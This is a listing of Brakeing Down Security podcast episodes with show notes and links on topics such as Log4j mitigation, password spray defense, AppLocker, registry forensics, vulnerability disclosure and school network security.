We are pleased to introduce Ms. Kim Green (Twitter: @kim1green). She is the CEO of KAZO Security, as well as the CISO/CPO of Zephyr Health, a #SaaS based #Healthcare data #analytics company. She brings over 20 years of experience in healthcare and leadership to help small and medium business companies get help from a #CISO to assist in an advisory role. Ms. Green also started a bug bounty program at Zephyr Health to assist them in shoring up their application, finding #vulnerabilities that their internal teams may have missed. We are going to discuss with her why they decided to make it a private bug bounty, and what was the result. https://www.youtube.com/watch?v=GbW777t1tTA -- more about the bug bounty We also discuss why#HIPAA seems to be so far behind in terms of being able to protect #PHI/#PII and what if anything can be done to fix it. We finish up discussing a recent news story about the how the National Football League (#NFL) team Washington Redskins had a trainer lose a laptop with the PII and health information on several thousand NFL players. We discuss why they did not violate HIPAA, and what if anything they did violate. iTunes: https://itunes.apple.com/us/podcast/2016-024-kim-green-on-cisoaas/id799131292?i=1000371021883&mt=2 YouTube: https://www.youtube.com/watch?v=F9zvkeuON4I&list=PLqJHxwXNn7guMA6hnzex-c12q0eqsIV_K&index=1 SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ | |||||||||||||||||||||||||||||||||
| 21 Jul 2014 | Part 2 with Georgia Weidman! | 00:46:04 | |||||||||||||||||||||||||||||||
It only gets better in Part 2 of our Interview with Georgia Weidman, Author, Security Researcher and Creator of the Smartphone Pentesting Framework.
She talks about how people underestimate the mobile platform for pentesting purposes, and we even find out that in addition to Teaching a class on exploit development at BlackHat this year, she's going to be helping a great organization overseas. We also got her talking about some do's and don'ts of pentesting! ;) Please enjoy!
Georgia's book on No Starch: http://www.nostarch.com/pentesting on Amazon.com: http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641 (non-sponsored link)
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) | |||||||||||||||||||||||||||||||||
| 09 May 2016 | 2016-018-software restriction policies and Applocker | 01:00:01 | |||||||||||||||||||||||||||||||
Windows has all the tools you need to secure an OS, but we rarely use them. One example of this is 'Software restriction policies'. Which is a method by which you can block certain files from being saved anywhere, what file types can be executed in a directory, and can even whether or not you should allow software to install. We also discuss the use of parental controls as a cheap, easy method of restricting users to access certain websites, installing software from iTunes store, or restricting access to certain functions or applications. Also, the 2nd clue for our CTF can be found in this podcast... see if you can find the giant clue... :) **NOTE: We had an issue with Mr. Boettcher's Windows 10 install, he's using Windows 10 Home, which does not appear to have Applocker or Software Restriction Policy by default. So, I cut a lot of us bickering^H^H^H^H discussing how to get it to work, so the middle around 25:00 mark will feel a tad off. Apologies... I should have stopped recording.
Links referred to during the podcast: https://technet.microsoft.com/en-us/library/hh831534.aspx http://mechbgon.com/srp/ - LOL, mentions the use of ‘parental controls’ to restrict systems http://www.instructables.com/id/Getting-past-Software-Restriction-Policies/ http://www.itingredients.com/how-to-deploy-software-restriction-policy-gpo/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-018-software_restriction_policy-applocker.mp3 #iTunes Link: https://itunes.apple.com/us/podcast/2016-018-software-restriction/id799131292?i=1000368338483&mt=2 #Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast RSS FEED: http://www.brakeingsecurity.com/rss #Twitter: @brakesec @boettcherpwned @bryanbrake #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ | |||||||||||||||||||||||||||||||||
| 05 May 2020 | 2020-017-Cameron Smith, business decisions, and how it affects Security | 01:08:05 | |||||||||||||||||||||||||||||||
Layer8conference is virtual (https://layer8conference.com/layer-8-is-online-this-year/) https://csrc.nist.gov/publications/detail/sp/800-171/rev-1/final
CMMC:https://info.summit7systems.com/blog/cmmc https://www.comptia.org/certifications/project - Project+ Cameron’s Smith = www.twitter.com/secnomancer Cybersmith.com - Up by 14 April
https://en.wikipedia.org/wiki/Christopher_Voss https://www.amazon.com/Never-Split-Difference-Negotiating-Depended/dp/0062407805 https://www.masterclass.com/classes/chris-voss-teaches-the-art-of-negotiation
https://www.autopsy.com/support/training/covid-19-free-autopsy-training/ https://www.youtube.com/playlist?list=PLg_QXA4bGHpvsW-qeoi3_yhiZg8zBzNwQ
“There is nothing noble in being superior to your fellow man; true nobility is being superior to your former self.”― Ernest Hemingway https://www.goodreads.com/quotes/76281-there-is-nothing-noble-in-being-superior-to-your-fellowOriginal B-Sides Talk Blurb SITREP: A Consultant's Perspective from the Trenches of InfoSec In this session you will hear war stories and lessons learned consulting for hundreds of clients across dozens of verticals at every level, from bootstrapped startups with garage beginnings to Fortune 50 companies and everything in between. We will cover life on the front lines in InfoSec, ranging from individual contributions and staying relevant in a rapidly evolving field all the way to how bad most orgs are at InfoSec and what we can do as practitioners to help make them better. Speaking GoalAfter my presentation is over, I want my audience to...
...so that ...
Intro
Security really isn't as complicated as most people think
Establish Credibility
Very Large Company Examples
Government Examples
Small Company Examples
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 23 Jun 2014 | OWASP Top Ten: 1-5 | 00:49:49 | |||||||||||||||||||||||||||||||
We finished up the OWASP Top Ten List. We discussed Injection, XSS, and other goodness. Find out what makes the Top 5 so special.
http://risky.biz/fss_idiots - Risky Business Interview concerning Direct Object Reference and First State Superannuation http://oauth.net/2/ - Great information on OAUTH 2.0.
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) | |||||||||||||||||||||||||||||||||
| 16 Dec 2021 | 2021-045-Mick Douglas, Log4j vulnerabilities, egress mitigations- part1 | 00:36:01 | |||||||||||||||||||||||||||||||
Introduction Overview of Log4j vuln (as of 16 December 2021) Why is it a big deal? (impact/criticality/risk) Talk about patching vs. mitigation why wasn’t this given the same visibility in 2009? Because it’s Oracle or Java? Good callout is building slides to brief org leadership, detections, and other educational tools. Vuln fatigue (Java vulns in 2009 and pretty much forever cause us fatigue) Are there other technologies like log4j that prop up the entire world, and we just don’t know? Egress traffic (discussed at length on twitter, what problems it solve?) https://twitter.com/mubix/status/1470430085169745920 Latest: https://www.theregister.com/2021/12/14/apache_log4j_v2_16_jndi_disabled_default/ - apache removed JDNI functionality https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/ <- great aggregation https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/ https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-313
Lots of discussion about “SBOM solving the issue”. @K8em0 weighs in https://twitter.com/k8em0/status/1469437490691932164
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 -list of advisories for log4j Mitigation: https://twitter.com/brunoborges/status/1469186875608875011 2009 in fact, #CVE-2009-1094, then a bypass was fixed in CVE-2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834. That's when the JDK was fully protected, but other implementations remained vulnerable https://bugzilla.redhat.com/show_bug.cgi?id=1639834 OpenJDK… https://twitter.com/ThinkstCanary/status/1469439743905697797?s=20 You can use a point & click canarytoken from https://canarytokens.org to help test for the #log4j / #Log4Shell issue. 1) visit https://canarytokens.org; 2) choose the Log4shell token; 3) enter the email address you wish to be notified at; 4) copy/use the returned string... Discussed in 2016 at Blackhat: https://twitter.com/th3_protoCOL/status/1469644923028656130 The #Log4Shell attack vector was known since 2016… Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread.
When dealing with attacks like this you should remember the acronym IMMA. I = Isolate M = Minimize M = Monitor A = Active Defense https://github.com/MarkBaggett/srum-dump “SRUM Dump extracts information from the System Resource Utilization Management Database and creates a Excel spreadsheet. The SRUM is one of the best sources for applications that have run on your system in the last 30 days and is invaluable to your incident investigations! To use the tool you will need a copy of the SRUM (located in c:\windows\system32\sru\srudb.dat, but locked by the OS). This tool also requires a SRUM_TEMPLATE that defines table and field names. You can optionally provide the SOFTWARE registry hive and the tool will tell you which wireless networks were in use by applications. If you are looking for a version of this tool that creates CSV files instead of an Excel spreadsheet, dumps targeted tables or processes any ese then check out ese2csv. ese2csv.exe is designed specifically for csv files with the CLI user in mind.” | |||||||||||||||||||||||||||||||||
| 16 May 2016 | 2016-019-Creating proper business cases and justifications | 00:54:43 | |||||||||||||||||||||||||||||||
Procurement is a process. Often a long drawn out, tedious process, but it is necessary to ensure that hardware and software is going to be what works in your organization. We go over what is necessary to make sure your procurement is as smooth as possible. Some of the topics we discuss include: 1. Aligning business goals and operational goals 2. How to discuss ROI with management 3. Getting actionable information for business requirements from affected parties 4. Steering yourself away from confirmation bias or optimism bias, and ensuring you're thinking critically when comparing the current status quo vs. a new solution 5. Information you might want to gather from potential vendors to make a more informed decision as to whether their product is the one you want And finally, we discuss how to handle the dread vendor demos. There may be a number of them, and they are arguably the best method of knowing the software or hardware is going to work for you. This is a topic that affects everyone, whether you are a manager, or a user of the technology involved. We also like to remind people that our DerbyCon CTF and raffle are still going on. There is plenty of time to get involved if you want a chance to get a ticket to Derbycon 2016! Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-019-business_cases_and_justifications-final.mp3 YouTube Link: https://youtu.be/8sWn1IYpgtY Links referred to in the show: http://www.ask.com/business-finance/business-justification-example-cdebe6f929949e8c http://www.iso20022.org/documents/BJ/BJ044/ISO20022BJ_ATICA_v4_with_comments.pdf http://klariti.com/business-case-2/business-case-justify-business-need/ https://en.wikipedia.org/wiki/Business_case https://en.wikipedia.org/wiki/Optimism_bias http://www.ehow.com/how_6672801_write-business-justification.html http://www.acqnotes.com/acqnote/careerfields/establishing-software-requirements
Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast RSS FEED: http://www.brakeingsecurity.com/rss #Twitter: @brakesec @boettcherpwned @bryanbrake #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ | |||||||||||||||||||||||||||||||||
| 21 Nov 2021 | Blumira Sponsor #3 - Emily Eubanks, more actionable events, incident response help, and more | 00:53:23 | |||||||||||||||||||||||||||||||
In this sponsored BDS episode, Bryan Brake and Amanda Berlin interview Emily Eubanks, a Security Operations Analyst for #Blumira. We discuss common business risks like IT staff turnover, a lack of Incident Response procedures, choosing not to follow PowerShell best practices, and MFA use for critical or sensitive applications. We also discuss ways to improve security posture to mitigate these risks as well as how Blumira can help organizations in light of these common business challenges.
https://www.reddit.com/r/cybersecurity/comments/qao73j/we_are_a_security_team_with_20_years_of_ethical/
https://attack.mitre.org/mitigations/M1032/ https://techcommunity.microsoft.com/t5/azure-active-directory-identity/your-pa-word-doesn-t-matter/ba-p/731984 https://www.yubico.com/blog/otp-vs-u2f-strong-to-stronger/
https://www.nist.gov/cyberframework/respond https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
https://www.blumira.com/analysis-of-a-threat-powershell-malicious-activity/ https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/learn-script-security https://devblogs.microsoft.com/powershell/secrets-management-module-vault-extensions/ https://www.reddit.com/r/PowerShell/comments/g3b9h5/how_are_you_managing_secrets/
ADDITIONAL LINKS AND SOURCES: [1] https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/learn-script-security [2] https://www.reddit.com/r/PowerShell/comments/g3b9h5/how_are_you_managing_secrets/ [3] https://github.com/PowerShell/SecretManagement [3] https://devblogs.microsoft.com/powershell/secrets-management-module-vault-extensions/ [4] https://www.nist.gov/cyberframework/respond [5] https://attack.mitre.org/mitigations/M1032/ [6] https://techcommunity.microsoft.com/t5/azure-active-directory-identity/your-pa-word-doesn-t-matter/ba-p/731984 [7] https://www.zdnet.com/article/microsoft-urges-users-to-stop-using-phone-based-multi-factor-authentication/ [8] https://www.yubico.com/blog/otp-vs-u2f-strong-to-stronger/
| |||||||||||||||||||||||||||||||||
| 22 Sep 2014 | Marcus J. Carey, FireDrillMe, and the Rockstars of Infosec | 00:35:42 | |||||||||||||||||||||||||||||||
Marcus J. Carey, a security research and software developer came on to talk to us about FireDrill.me, a tool used to help people work out their Incident Response muscles. He is also the creator of threatagent.com. Marcus is well known in Security circles, and after we talked to him about FireDrill and ThreatAgent, we got his opinion of other subjects that interested us in the Infosec industry. Marcus is a man of his own mind, and he certainly did not disappoint. Hope you enjoy Part 1 of our conversation with him. We also asked him about the celebrity that many in the industry face, and how it should be handled by people in the industry. HoneyDocs - http://www.pcworld.com/article/2048881/honeydocs-lays-irresistible-bait-for-hackers.html Malcolm Gladwell - http://en.wikipedia.org/wiki/Malcolm_Gladwell
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) | |||||||||||||||||||||||||||||||||
| 11 Oct 2020 | 2020-037-Katie Moussouris, Implementing VCMM, diversity in job descriptions - Part 2 | 00:39:18 | |||||||||||||||||||||||||||||||
Introduce Katie (bio) (@k8em0) CEO and Owner, LutaSecurity The scope of the VCMM (what is it?) VCMM - Vulnerability Coordination Maturity Model https://www.lutasecurity.com/vcmm Just covers the internal process? To ready an org for a bug bounty program or to accept vulns from security researchers? You mentioned not playing whack-a-mole, when it comes to responding at the beginning of a vuln disclosure program. Is the directing of different categories of bugs one of the things that goes into not having to just wait for the bugs to roll in?
What’s the timeline for this process? “We need something for a product launch next week…” Stakeholders involved? CISO? Security team? IT? Devs? What precipitates the need for this? Maturity? Vuln Disclosure? Are the ISO docs required for this to work, or will they assist in an easier outcome? https://blog.rapid7.com/2017/12/19/nist-cyber-framework-revised-to-include-coordinated-vuln-disclosure-processes/ 10 worst jobs (popsci article): https://web.archive.org/web/20070712070214/https://www.popsci.com/popsci/science/0203101256a23110vgnvcm1000004eecbccdrcrd.html How does an org use this to communicate vulnerabilities in their own products? What’s the bare minimum you need on this chart for a successful program? Are any facets more important than the others? Does anyone hit all 3s, or is that a pipedream? Incentive “no legal action will be taken”. People want money… not tours, not 10-point font. How do you convince ‘good’ bug writers to want to help you for a ‘thank you’? Should incentive be a ‘Level 3’ or would you consider it not ready for prime-time? https://www.zdnet.com/article/yahoo-changes-bug-bounty-policy-following-t-shirt-gate/ Vuln reporting Lots of Twitter fodder of companies that handle vuln disclosure poorly, even folks say that you shouldn’t bother and deal with a 3rd party. If a company is taking bugs and doing all the baseline items, what are some other things they could do to make security disclosure easier? Clearly stated bugs@ or Security@ (and not buried in 3 point font in the privacy policy, or ToS) SLA to reply to all bugs? Standardized disclosure form for discoveries? Slide Presentation Overview: https://7bb97855-c50f-4dce-9a1c-325268684c64.filesusr.com/ugd/ed9b4b_f04d16446542494887906777a39204bf.pdf ISO 29147:2018 - $150 USD https://www.iso.org/standard/72311.html ISO 30111:2019 - $95 USD https://www.iso.org/standard/69725.html ISO 27034-7:2018 - $150 USD https://www.iso.org/standard/66229.html Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 29 Apr 2019 | 2019-016-Conference announcement, and password spray defense | 00:46:11 | |||||||||||||||||||||||||||||||
Agenda:
Announce the conference CFP: up soon CFW: up soon Campers: Friday night/Saturday night Like “toorcamp”, but if it sucks, you can drive home… :D
Limiting tickets, looking for sponsors To support the conference and future initiatives: “Infosec Education Foundation” 501c3 non-profit (we are working on the charity part)
Password spraying https://github.com/dafthack/DomainPasswordSpray
Stories:
https://blog.stealthbits.com/using-stealthdefend-to-defend-against-password-spraying/
http://blog.quadrasystems.net/post/password-spray-attacks-and-four-sure-steps-to-disrupt-them
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/simplifying-password-spraying/
Detecting one to many…..and at what point/threshold during an attack would it be a PITA for the redteam to slow down to
Annoying NXLog CE limitation
Log-MD can help detect? Yep
CTF Club is happening again Pinkie Pie is running it. Saturdays at 2 -3 pm
| |||||||||||||||||||||||||||||||||
| 20 Oct 2014 | Keep Calm and take a tcpdump! :) | 00:38:20 | |||||||||||||||||||||||||||||||
Tcpdump is just one of the tools that will make troubleshooting network issues, or testing applications, or even finding out what traffic is being generated on a host all that much easier. This podcast is to help you understand the Tcpdump program, and how powerful it is...
http://danielmiessler.com/study/tcpdump/ http://www.thegeekstuff.com/2010/08/tcpdump-command-examples/ http://www.tecmint.com/12-tcpdump-commands-a-network-sniffer-tool/ http://www.amazon.com/TCP-Illustrated-Vol-Addison-Wesley-Professional/dp/0201633469 http://www.computerhope.com/unix/tcpdump.htm http://www.commandlinefu.com/commands/using/tcpdump -- excellent examples http://www.amazon.com/Practical-Packet-Analysis-Wireshark-Real-World/dp/1593272669/
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) | |||||||||||||||||||||||||||||||||
| 01 Dec 2014 | Part 2 w/ Ben Donnelly -- Introducing Ball and Chain (making password breaches a thing of the past) | 00:37:41 | |||||||||||||||||||||||||||||||
Last week, we talked with Ben Donnelly about ADHD (Active Defense Harbinger Distro). But Ben isn't a one trick pony, oh no... this young punk is trying to solve fundamental problems in the business industry, in particular securing passwords. That's why he's been working with Tim Tomes (@lanmaster53)invented 'Ball and Chain', which is a large (>2TB) file that can be used to help generate passwords and entropy.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) | |||||||||||||||||||||||||||||||||
| 29 Sep 2014 | Marcus J. Carey Interview Part 2 - China, IP, coming cyber war | 00:47:08 | |||||||||||||||||||||||||||||||
We finished up our odyssey with Marcus J. Carey this week. We picked his brain about how he feel about China, the coming cyberwar, and what kinds of tools he uses in his toolbox (hint: he doesn't use Kali). We also talk a bit about the entitlement of people, and what makes folks in poorer countries turn to hacking. We really enjoyed hearing his take on certifications and education. He's a Ruby nut, but suggests that people learn Python. He also talks about how he teaches people about security. The little everyday things that show you do security. A thought provoking interview that will definitely inspire you to pour yourself into a Python book, or to grab a Raspberry Pi and start learning.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) | |||||||||||||||||||||||||||||||||
| 26 Jan 2021 | 2021-003- Danny Akacki, open communications, mergers&acquistions | 00:46:09 | |||||||||||||||||||||||||||||||
Discussion on Mergers and acquisitions processes On being acquired, but also if you’re acquiring a company Best Practices Best Practices of Mergers and Acquisitions (workforce.com)
The Role of Information Security in a Merger/Acquisition (bankinfosecurity.com)
Security Considerations in the Merger/Acquisition Process (sans.org) Women Unite Over CTF 3.0 (ittakesahuman.com) The 10 steps to successful M&A integration | Bain & Company Savvy Hackers Use Spearphishing to steal Wall Street M&A info (knowbe4.com) “We’ve been acquired by X!” First thing people think “what’s gonna happen to me.”
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 27 Jun 2016 | 2016-025-Windows Registry, Runkeys, and where malware likes to hide | 00:50:48 | |||||||||||||||||||||||||||||||
The windows registry has come a long way from it's humble beginnings in #Windows 3.11 (Windows for Workgroups). This week, we discuss the structure of the Windows registry, as well as some of the inner workings of the registry itself. We also discuss where are some good places to find malware, some of the key values that you can find in the #registry and their meanings. We also discuss what atomicity is and how the registry is a lot like a database in how it functions. And no podcast about Windows #forensics should be done without talking about a tool, and our friend David #Longenecker (@dnlongen on Twitter) created a cross-platform tool that allows you to take exports of the registry and analyze them without need to be physically on the host. You can find reglister here: http://www.securityforrealpeople.com/2015/08/introducing-new-forensics-tool-reglister.html
We finish up discussing our #DerbyCon giveaways and a peek at what will be a very interesting podcast next week. Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-025-Windows_Registry-RunKey_artifacts-finding_where_malware_hides.mp3 iTunes: https://itunes.apple.com/us/podcast/2016-025-windows-registry/id799131292?i=1000371465676&mt=2
SoundCloud: https://soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
| |||||||||||||||||||||||||||||||||
| 07 Dec 2020 | SPONSORED- Nathanael Iversen from Illumio, future of microsegmentation, | 00:36:30 | |||||||||||||||||||||||||||||||
BrakeSec Sponsored Interview with Nathanael Iversen
Questions, comments, and other content goes here:
Illumio Nathanael Iversen BDS Podcast Messaging
Topic: Overview of development and deployment of micro-segmentation
Where does segmentation fit into your security strategy?
The keys to a successful micro-segmentation deployment: As with any security control, it’s important to balance the strategy of the business with the need to secure it. There are several key functions and abilities to consider to ensure your deployment goes smoothly:
There are three broad preventive security actions:
Potential questions:
| |||||||||||||||||||||||||||||||||
| 12 Jan 2021 | 2021-001-news, youtuber 'dream' doxxed, solarwind passwords bruteforced, malware attacks | 00:46:57 | |||||||||||||||||||||||||||||||
Dream Doxxed: Minecraft YouTuber Dream Doxxed Following Speedrun Controversy (screenrant.com) Osint issues… found him by breadcrumbs and using zillow internal pics of his house. Craziness How to Use APIs (explained from scratch) (secjuice.com) Hackers target cryptocurrency users with new ElectroRAT malware | ZDNet
Cobalt Strike and Metasploit accounted for a quarter of all malware C&C servers in 2020 | ZDNet
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 29 May 2016 | 2016-021: Carbon Black's CTO Ben Johnson on EDR, the layered approach, and threat intelligence | 00:57:38 | |||||||||||||||||||||||||||||||
Ben Johnson (@chicagoben on Twitter) has spent a good deal of time working on protecting client's endpoints. From his work at the NSA, to being the co-founder of Carbon Black (@carbonblack_inc). We managed to have him on to discuss EDR (#Endpoint Detection and Response), TTP (#Tactics, Techniques, and Procedures), and #Threat #Intelligence industry. Ben discusses with us the Layered Approach to EDR: 1. Hunting 2. Automation 3. Integration 4. Retrospection 5. Patterns of Attack/Detection 6. indicator-based detection 7. Remediation 8. Triage 9. Visibility We also discuss how VirusTotal's changes in policy regarding sharing of information is going to affect the threat intel industry. Ben also discusses his opinion of our "Moxie vs. Mechanisms" podcast, where businesses spend too much on shiny boxes vs. people. Brakesec apologizes for the audio issues during minute 6 and minute 22. Google Hangouts was not kind to us :( Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-021-Ben_Johnson-Carbon_black-Threat_intelligence.mp3 iTunes: https://itunes.apple.com/us/podcast/2016-021-carbon-blacks-cto/id799131292?i=1000369579669&mt=2 YouTube: https://youtu.be/I10R3BeGDs4 RSS: http://www.brakeingsecurity.com/rss Show notes: https://docs.google.com/document/d/12Rn-p1u13YlmOORTYiM5Q2uKT5EswVRUj4BJVX7ECHA/edit?usp=sharing (great info) https://roberthurlbut.com/blog/make-threat-modeling-work-oreilly-2016
Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ | |||||||||||||||||||||||||||||||||
| 01 Feb 2022 | Bit of news, Belarus train system hack, VMware Horizon vulns, edge network device vulns | 00:43:54 | |||||||||||||||||||||||||||||||
News articles we covered this week: https://www.wired.com/story/belarus-railways-ransomware-hack-cyber-partisans/ https://www.hackingarticles.in/linux-privilege-escalation-polkit-cve-2021-3560/ https://old.reddit.com/r/msp/comments/s48iji/vmware_horizon_servers_being_actively_hit_with/ Whimmery's Walkthroughs: Join @whimmery on her twitch or on the @brakesec Youtube channel for walkthroughs on Burp Suite training and more! Twitter handles:
Bryan Brake: @bryanbrake
| |||||||||||||||||||||||||||||||||
| 27 May 2023 | Bsides Seattle and Austin, SecureBoot patch, and more | 01:12:36 | |||||||||||||||||||||||||||||||
| 07 Apr 2020 | 2020-013- part 2, education security, ransomware, april mardock, Nathan McNulty, and Jared folkins | 01:02:21 | |||||||||||||||||||||||||||||||
April Mardock - CISO - Seattle Public Schools Jared Folkins - IT Engineer - Bend La Pine Schools Nathan McNulty - Information Security Architect - Beaverton School District
OpSecEdu - https://www.opsecedu.com/ Slack
https://www.a4l.org/default.aspx
BEC - https://www.trendmicro.com/vinfo/us/security/definition/business-email-compromise-(bec)
https://www.k12cybersecurityconference.org/
Bypassing security controls - https://www.goguardian.com/blog/technology/how-students-bypass-school-web-filters-and-how-to-stop-them/
https://community.spiceworks.com/topic/2077711-chromebook-google-docs-bypassing-filters https://www.mobicip.com/blog/here%E2%80%99s-how-kids-bypass-apple%E2%80%99s-parental-control-tools
